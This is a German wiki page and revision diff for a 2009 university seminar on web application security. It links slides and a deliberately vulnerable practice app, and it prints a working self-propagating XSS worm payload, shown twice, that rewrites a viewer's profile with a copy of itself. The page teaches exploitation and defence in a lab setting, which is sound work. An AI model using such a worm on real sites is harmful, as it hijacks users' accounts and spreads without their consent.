KunterBuntesSeminar-SS09/(Un)Sicherheit in Webanwendungen: Unterschied zwischen den Versionen
T (Diskussion | Beiträge) (→Folien/Material: +folien) |
Keine Bearbeitungszusammenfassung |
||
Zeile 15: | Zeile 15: | ||
= Folien/Material = | = Folien/Material = | ||
Folien | Folien: [[Bild:Sicherheit in webapplikationen.pdf]] | ||
Präparierte Webanwendung: [[Bild:Stasivz.tar.gz]] | |||
XSS-Wurm: <pre>hacked<script>(function(){a=new XMLHttpRequest(); | |||
a.open('POST','index.php?page=editprofile',true); | |||
a.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); | |||
a.send('change_profile=1&movie=hacked<script>('. | |||
concat(escape(arguments.callee.toString().concat(')();</scr'). | |||
concat('ipt>')))); })();</script></pre> | |||
(Zeilenumbrüche vorher entfernen) | |||
= Weiterführende Links = | = Weiterführende Links = |
Version vom 16. Mai 2009, 14:27 Uhr
Das ist der 5. Termin vom KunterBuntesSeminar-SS09
Abstract
Ich möchte euch die Grundlagen der Sicherheit in Webanwendungen erläutern und dabei typische Schwachstellen aufzeigen. Es wird darum gehen, wie man diese verhindert, aber auch ausnutzen kann. Das Ausnutzen der Schwachstellen werden wir interaktiv an einer präparierten Webanwendung üben um so das Gelernte zu festigen. Der Vortrag wird ein wenig PHP-lastig sein, dieses ist zwei Umständen geschuldet: Erstens sind die meisten Webanwendungen in PHP geschrieben und zweitens macht PHP es den Programmierern sehr leicht sich selbst ins Knie zu schiessen.
Auch wenn du keine Vorkenntnisse hast und dir Begriffe wie "PHP", "HTTP" oder "SQL" nichts sagen, keine Panik, es wird alles von 0 an erklärt.
Seminarvortrag
FIXME (nach dem Seminar)
Vortragende
Henning (8pridoeh): Fragen zum Thema beantworte ich gerne. Ihr findet mich hin und wieder im c.t. oder anderswo in der Gegend.
Folien/Material
Folien: Datei:Sicherheit in webapplikationen.pdf
Präparierte Webanwendung: Datei:Stasivz.tar.gz
XSS-Wurm:
hacked<script>(function(){a=new XMLHttpRequest(); a.open('POST','index.php?page=editprofile',true); a.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); a.send('change_profile=1&movie=hacked<script>('. concat(escape(arguments.callee.toString().concat(')();</scr'). concat('ipt>')))); })();</script>
(Zeilenumbrüche vorher entfernen)
Weiterführende Links
Firefox-Addons:
Cheat Sheets: